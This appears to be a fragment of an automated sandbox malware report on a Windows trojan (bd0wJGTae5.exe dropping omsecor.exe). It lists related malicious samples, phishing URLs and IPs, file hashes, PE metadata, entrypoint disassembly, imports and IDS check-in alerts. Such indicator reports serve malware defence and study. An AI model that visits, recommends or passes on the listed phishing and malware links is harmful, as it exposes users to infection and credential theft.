                                                                                                                                                                                                • 52.34.198.229
                                                                                                                                                                                                mkkuei4kdsz.comHUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 15.197.204.56
                                                                                                                                                                                                cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 64.225.91.73
                                                                                                                                                                                                Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 64.225.91.73
                                                                                                                                                                                                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 64.225.91.73
                                                                                                                                                                                                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 64.225.91.73
                                                                                                                                                                                                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 64.225.91.73
                                                                                                                                                                                                djvu452.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 64.225.91.73
                                                                                                                                                                                                gdvfd35.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 64.225.91.73
                                                                                                                                                                                                v48ge.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 64.225.91.73
                                                                                                                                                                                                moviename.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 64.225.91.73
                                                                                                                                                                                                lousta.netHUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                djvu452.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                v48ge.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                moviename.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                voltage.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                FUNETASFIHUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                document.log.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 193.166.255.171
                                                                                                                                                                                                j3Lr4Fk7Kb.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                • 86.50.36.169
                                                                                                                                                                                                nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 130.232.111.233
                                                                                                                                                                                                splarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 192.98.38.193
                                                                                                                                                                                                mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                • 157.24.20.223
                                                                                                                                                                                                nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 193.166.100.123
                                                                                                                                                                                                jklppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 128.214.222.213
                                                                                                                                                                                                AMAZON-02USdlr.arm6.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                                                                • 54.217.10.153
                                                                                                                                                                                                zmap.ppc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                https://woobox.com/sf4hxrGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 52.217.197.137
                                                                                                                                                                                                https://u7990385.ct.sendgrid.net/ls/click?upn=u001.oZ6GXC16Ztdw1ob-2F3C5yow-2FsK2YC4S8s269h9OLgp-2FGcQesCtXDXKgCEAF90Sa3OUL2ncGoAKstQjRhddelr-2Bx3frrehyL8aaBbhAx-2Fm3uQTToUZwzw9vU-2BHl4N8-2FbXNrXNM8F2aafYGXvb9twEoQeHC7ZwjccAi1SjLazzmL714x6k-2BjB-2FYwt496nNWzarkpA5xghtVvgqYssmknAftbQJOVkiDX5sql0puMOlG6Ca2eid008YPu-2FJJAayp-2BNXls84A_lhEpvcamcm95WhC017PRgRonrgi5omZ3brQwNa5yLk0xxDl3uLY9zV0ZhBwsp9AfIBgWj8srFe156S5Zns8ZjIc0B22GBm-2FhZ3msRvLKzUyGIuCFlA1E-2FK-2F4jc3IgU8qM5k5KxMmIwIRDSCQDvTZvmwB5zeTeqWWEJR7CvWSpeaqIj3hj5IgcRcoPBdptLYrUK3YLUsGuU0Nn50M3ArOROvseGYqZul0QkeqtDR41-2FsPFt-2Bw0YWW2P5gsCDH4XINxncIhICPIqlacC1ih-2B-2BRAhsouCrf5nolEyzWx0VnR2OrLuGwvR4-2BmBTgXGq5SQJ3CbNvM-2FaB5BLerpFqmqjPC-2FBlK6th1iVrhfmtBEFKLash-2FnkPpQ9qFxGwWTexJMh100AS4PilK2-2BJDfvjssuxk2jP-2BTagNOazV2F1Jk9Mugr3y7E9SivEGWyUbzdMThmnpVydb1qOFwMiocztErv1WWaB8B20Oa2SLt-2BLBsMdusfLwd3NNzPre6el-2F-2BIwBxDAqBb9JLV6vOLzfaD2L4-2BEuPbgzcrscVtaCNyARGoPUKi03imhTbJEcig8L4weEiABND5vwKtA-2FhKo5AjxecXMO22Vq7Og2y7v-2BJNgFB9rr-2Bm4W45XZxFP39Dqi18SUPOKX4pHFrdACciPinuj2QtBtIGNjV46-2Bve9hu0g1-2FpG1tOVv9Ebn32k-2Bl6CF6b6jzS3aTQvZkWKNIwLx5CoGs9uomn9yZPi6QaiSTeQkZ1uHupSYpVxbBCb-2FUyo6kMlbB0P27ShEzUFVY-2FpfPcfFofTKD4p7rklaM-2FIuG8-2F3ytR7SJ7I8GmSP8NTWs4vu3NTpV5MkgHfjeFoK-2BDQh6M7S2ys2qIf8m3qiLtFMHY6p7m4ep8JZqbC0axloFSX-2Fzbz51ZW-2BsyQEEbRqwx0S1i4lo9NhRXrfXOvn0A83bBDk31g9QfoWTGhHCjSEfuca9KJwe0GCABYAuqYeYHMc5qXhPv86r0l0ldRpwe39V9LJ5m6Go-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 65.9.66.43
                                                                                                                                                                                                https://hotmail.cdisaomiguel.com.brGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 18.245.31.5
                                                                                                                                                                                                https://tas-pe.com/ahowe@europait.net#ahowe@europait.netGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 18.245.31.121
                                                                                                                                                                                                https://us.pbe.encryption.symantec.com/login.html?msgUserId=13963009e4fab12e&enterprise=questdiagnostics&rrRegcode=9hfnDzwZ&locale=en_USGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 52.14.194.37
                                                                                                                                                                                                HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 52.34.198.229
                                                                                                                                                                                                ae713827-e32c-f66b-fbdb-5405db450711.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 75.2.57.54
                                                                                                                                                                                                boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                • 54.171.230.55
                                                                                                                                                                                                TANDEMUSHUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                • 15.197.204.56
                                                                                                                                                                                                https://send-space.s3.eu-north-1.amazonaws.com/de.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 15.197.193.217
                                                                                                                                                                                                FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                • 15.197.225.128
                                                                                                                                                                                                BbkbL3gS6s.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 15.197.137.111
                                                                                                                                                                                                Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 15.197.193.217
                                                                                                                                                                                                Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                • 15.197.148.33
                                                                                                                                                                                                la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 15.211.66.93
                                                                                                                                                                                                http://bigfoot99.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 15.197.193.217
                                                                                                                                                                                                https://ascot.auditboardapp.com/task-redirect/4113?source=email&CTA=taskTitleLink&notificationId=044e55a3-481a-4a33-91c7-abbaf803b1d7&projectId=367&taskId=4113&notificationType=WS-task-submittedGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 15.197.213.252
                                                                                                                                                                                                la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 15.196.196.61
                                                                                                                                                                                                No context
                                                                                                                                                                                                No context
                                                                                                                                                                                                Process:C:\Users\user\Desktop\bd0wJGTae5.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):82768
                                                                                                                                                                                                Entropy (8bit):6.931980900926571
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:fd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZcl/52izbR9Xwzz:XdseIOMEZEyFjEOFqTiQmOl/5xPvw3
                                                                                                                                                                                                MD5:DC5D106C7C04B52DF85467D6D647221A
                                                                                                                                                                                                SHA1:9EFAA7C7B942296F113737B372A241E48AC7AEBB
                                                                                                                                                                                                SHA-256:B2EC66DF552BBA33B49E27925A0C8A428831BF97CD68C092A51DAA6C8130A8BD
                                                                                                                                                                                                SHA-512:C70D3A5988ECF12F363A5E2314987A77AF6100BAAF596B631E266EF941080F330569A00D300E413C75CD03C5EE61328A3CD18E7F98596D5372B3E11F9EDC8837
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m.m.m.m...m.m.m...mRich...m................PE..L......P............................F.............@.........................................................................|...........................PM..............................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):100
                                                                                                                                                                                                Entropy (8bit):1.9101865117490426
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:gtqyu/GRJ8JSxNdl:gwDeR+J2
                                                                                                                                                                                                MD5:EB1BFD27DEBD289CF899F80411359712
                                                                                                                                                                                                SHA1:EB1FD916187CDBED9A9A021F99FA969AB6567F24
                                                                                                                                                                                                SHA-256:C0407595D81656749554168E6888DF464D0A906ECFBEC36B3A3122BD8609126B
                                                                                                                                                                                                SHA-512:A11A83C7ADA0B830D307FE4463DA374536BE7402BEAB400689762353119A5B41990D9788721F7D9EC1E86427609BA9FE65E5FF4681EA4AC86668ADA23A0200B9
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:-x.x.x.x.x.x6x.x.xxxIxKxKxOxLxAxLxOxHxLxNxIxNxKxMxAx@x@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):82768
                                                                                                                                                                                                Entropy (8bit):6.931979532169011
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:Yd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZcl/52izbR9Xwzz:odseIOMEZEyFjEOFqTiQmOl/5xPvw3
                                                                                                                                                                                                MD5:1F90E0A8D463721EBCD937EF25C65D05
                                                                                                                                                                                                SHA1:0DF5B439B5BE601869FAABBA634389411FCCF016
                                                                                                                                                                                                SHA-256:ADF9C23D48995613BF4DCE3431ACC28C0A615552295A6D087F5E6F282F8B58E0
                                                                                                                                                                                                SHA-512:953175107BB29F2D175EEDAAA4ACFD4EB91241E9E5F08BEF95DD34E17ADE07FF2C69057C4531BAE56CCF7746A9FF23B4D94F62A79CBCA0898AE29366C637B051
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m.m.m.m...m.m.m...mRich...m................PE..L.....P............................F.............@.........................................................................|...........................PM..............................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Entropy (8bit):6.931981333700789
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                File name:bd0wJGTae5.exe
                                                                                                                                                                                                File size:82'768 bytes
                                                                                                                                                                                                MD5:cc4504807e32f91497d2c5a8dd1061f6
                                                                                                                                                                                                SHA1:497678a9f8adc08d092b720d45797ad245e3d9d7
                                                                                                                                                                                                SHA256:fb7cfd956db9c5dfdf55ddc48bfe2608f40dbbc91965d7791cf19f02fb931289
                                                                                                                                                                                                SHA512:86e871e5a7b964c322862a642f34b0d5028ff038729500ba24a414ef0ec31b916bc51cef87d5827db2d08c2be524ec0353b1c0f9ada179eb55a32c2dcafde454
                                                                                                                                                                                                SSDEEP:1536:Hd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZcl/52izbR9Xwzz:vdseIOMEZEyFjEOFqTiQmOl/5xPvw3
                                                                                                                                                                                                TLSH:C7839D95B6F88076E9A318B0627CE9929CBDBEB515A0D0C3D350AC871DE13D2D73435B
                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m...m.m.m...m.m.m...mRich...m................PE..L...Z..P...................
                                                                                                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                Entrypoint:0x40b346
                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                DLL Characteristics:
                                                                                                                                                                                                Time Stamp:0x50B3A35A [Mon Nov 26 17:14:02 2012 UTC]
                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                Import Hash:08b67a9663d3a8c9505f3b2561bbdd1c
                                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                                Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                Error Number:-2146869232
                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                • 02/09/2021 19:25:58 01/09/2022 19:25:58
                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                Version:3
                                                                                                                                                                                                Thumbprint MD5:07BA2F139D35455A934AB0CED10CBE41
                                                                                                                                                                                                Thumbprint SHA-1:5A257D333718C4B468A5DBC6643348AF667AEE3D
                                                                                                                                                                                                Thumbprint SHA-256:F66C648A39C2B4845719707319B96BA37A6EFC854D02D4AB3EDA1B2DA853B7EB
                                                                                                                                                                                                Serial:3300000439F61F7A676DA000AF000000000439
                                                                                                                                                                                                Instruction
                                                                                                                                                                                                push ebp
                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                mov eax, 00001800h
                                                                                                                                                                                                call 00007F7D646E9BB2h
                                                                                                                                                                                                push ebx
                                                                                                                                                                                                push esi
                                                                                                                                                                                                push edi
                                                                                                                                                                                                mov edi, dword ptr [0040E0B0h]
                                                                                                                                                                                                mov esi, 00000400h
                                                                                                                                                                                                push esi
                                                                                                                                                                                                lea eax, dword ptr [ebp-00000800h]
                                                                                                                                                                                                push eax
                                                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                                                push ebx
                                                                                                                                                                                                call edi
                                                                                                                                                                                                push 0040F4FCh
                                                                                                                                                                                                lea eax, dword ptr [ebp-00000800h]
                                                                                                                                                                                                call 00007F7D646E1A6Ah
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                je 00007F7D646E79AFh
                                                                                                                                                                                                lea eax, dword ptr [ebp-00001800h]
                                                                                                                                                                                                push eax
                                                                                                                                                                                                call 00007F7D646E71E6h
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                jne 00007F7D646E799Eh
                                                                                                                                                                                                push esi
                                                                                                                                                                                                lea eax, dword ptr [ebp-00000800h]
                                                                                                                                                                                                push eax
                                                                                                                                                                                                push ebx
                                                                                                                                                                                                call edi
                                                                                                                                                                                                push 00000001h
                                                                                                                                                                                                lea eax, dword ptr [ebp-00000800h]
                                                                                                                                                                                                push eax
                                                                                                                                                                                                push 0040F414h
                                                                                                                                                                                                push 0040F1D8h
                                                                                                                                                                                                push 80000001h
                                                                                                                                                                                                call 00007F7D646E2F96h
                                                                                                                                                                                                add esp, 14h
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                push 00000004h
                                                                                                                                                                                                je 00007F7D646E7957h
                                                                                                                                                                                                push ebx
                                                                                                                                                                                                push 00000003h
                                                                                                                                                                                                jmp 00007F7D646E795Bh
                                                                                                                                                                                                call dword ptr [0040E064h]
                                                                                                                                                                                                push eax
                                                                                                                                                                                                push 00000006h
                                                                                                                                                                                                call 00007F7D646E6D03h
                                                                                                                                                                                                add esp, 0Ch
                                                                                                                                                                                                call 00007F7D646E7843h
                                                                                                                                                                                                call 00007F7D646E706Dh
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                jne 00007F7D646E7944h
                                                                                                                                                                                                call 00007F7D646E70E3h
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                je 00007F7D646E79B3h
                                                                                                                                                                                                push 00002710h
                                                                                                                                                                                                call dword ptr [0040E070h]
                                                                                                                                                                                                push 00000004h
                                                                                                                                                                                                push ebx
                                                                                                                                                                                                push 00000009h
                                                                                                                                                                                                call 00007F7D646E6CD4h
                                                                                                                                                                                                add esp, 0Ch
                                                                                                                                                                                                push esi
                                                                                                                                                                                                lea eax, dword ptr [ebp+00000000h]
                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                • [ASM] VS2005 build 50727
                                                                                                                                                                                                • [ C ] VS2005 build 50727
                                                                                                                                                                                                • [LNK] VS2005 build 50727
                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xf77c0xb4.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xf6000x4d50
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf6a80x40.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xe0000x1b4.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                .text0x10000xcc180xce007d17b3af3ad18f4a94d7ab9fe07eac18False0.5967650182038835data6.6299319364593226IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .rdata0xe0000x21440x220056d9054057018e96543087e97c2a076eFalse0.4463465073529412data4.458482003449311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .data0x110000x1712c0x2009159e4683d74ea27f29c3b096294f663False0.466796875data3.7016590486098133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                WININET.dllHttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetSetPerSiteCookieDecisionW, InternetOpenUrlW, InternetAttemptConnect, InternetOpenW, InternetReadFile, InternetClearAllPerSiteCookieDecisions, InternetCloseHandle, InternetQueryDataAvailable, InternetSetOptionW
                                                                                                                                                                                                SHLWAPI.dllStrStrIW, PathMatchSpecW, PathCombineW, wvnsprintfW, StrStrIA, PathRemoveFileSpecW
                                                                                                                                                                                                KERNEL32.dllTerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetVersionExA, HeapReAlloc, RtlUnwind, WideCharToMultiByte, MultiByteToWideChar, HeapCreate, CopyFileW, CreateThread, WaitForMultipleObjects, GetTickCount, DeleteFileW, CreateProcessW, SetUnhandledExceptionFilter, ExitProcess, GetLastError, LoadLibraryW, GetProcAddress, Sleep, VirtualProtect, GetPrivateProfileIntW, ExpandEnvironmentStringsW, GetPrivateProfileStringW, FindFirstFileW, SetFilePointer, SetEndOfFile, GetVersionExW, HeapAlloc, SetWaitableTimer, SystemTimeToFileTime, CreateWaitableTimerW, FindNextFileW, HeapFree, ReadFile, GetModuleFileNameW, GetFileTime, WaitForSingleObject, GetTimeZoneInformation, CreateFileW, CloseHandle, GetFileSizeEx, VirtualFree, GetProcessHeap, GetCurrentDirectoryW, VirtualAlloc, VirtualQuery, GetSystemTime, GetFileSize, FindClose, WriteFile, GetLocalTime, GetModuleHandleW, GetCommandLineW
                                                                                                                                                                                                USER32.dllGetWindowLongW, DispatchMessageW, GetForegroundWindow, CharLowerW, CreateWindowExW, FindWindowW, PeekMessageW, SetForegroundWindow, GetSystemMetrics, MessageBoxW, SetWindowPos, SetWindowLongW, SetParent
                                                                                                                                                                                                ADVAPI32.dllRegOpenKeyExW, RegEnumKeyExW, RegQueryValueExW, RegSetValueExW, RegCreateKeyExW, RegCloseKey
                                                                                                                                                                                                SHELL32.dllSHGetFolderPathW
                                                                                                                                                                                                ole32.dllCoCreateInstance, OleInitialize, CoInitialize
                                                                                                                                                                                                OLEAUT32.dllSysFreeString, VariantInit, SysAllocString, VariantClear
                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                2024-11-01T16:03:56.410998+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449730193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:04:05.127285+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449731193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:04:05.885040+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44973215.197.204.5680TCP
                                                                                                                                                                                                2024-11-01T16:04:07.185778+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44973352.34.198.22980TCP
                                                                                                                                                                                                2024-11-01T16:04:07.207285+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.449733TCP
                                                                                                                                                                                                2024-11-01T16:04:07.207285+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.449733TCP
                                                                                                                                                                                                2024-11-01T16:04:11.505641+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449735TCP
                                                                                                                                                                                                2024-11-01T16:04:15.921297+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449734193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:04:16.027992+01002016998ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host)1192.168.2.449741193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:04:24.544476+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449741193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:04:25.297259+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44974215.197.204.5680TCP
                                                                                                                                                                                                2024-11-01T16:04:26.234709+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44974352.34.198.22980TCP
                                                                                                                                                                                                2024-11-01T16:04:34.852422+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449744193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:04:43.451298+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449745193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:04:43.943414+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44974215.197.204.5680TCP
                                                                                                                                                                                                2024-11-01T16:04:44.887601+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44974752.34.198.22980TCP
                                                                                                                                                                                                2024-11-01T16:04:49.791712+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449769TCP
                                                                                                                                                                                                2024-11-01T16:04:53.615773+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449748193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:05:02.221231+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449798193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:05:03.027476+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44983815.197.204.5680TCP
                                                                                                                                                                                                2024-11-01T16:05:03.976731+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44984452.34.198.22980TCP
                                                                                                                                                                                                2024-11-01T16:05:12.687295+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449851193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:05:21.282609+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449899193.166.255.17180TCP
                                                                                                                                                                                                2024-11-01T16:05:22.052289+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44994515.197.204.5680TCP
                                                                                                                                                                                                2024-11-01T16:05:23.012530+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.44995152.34.198.22980TCP
                                                                                                                                                                                                2024-11-01T16:05:31.722523+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.449958193.166.255.17180TCP
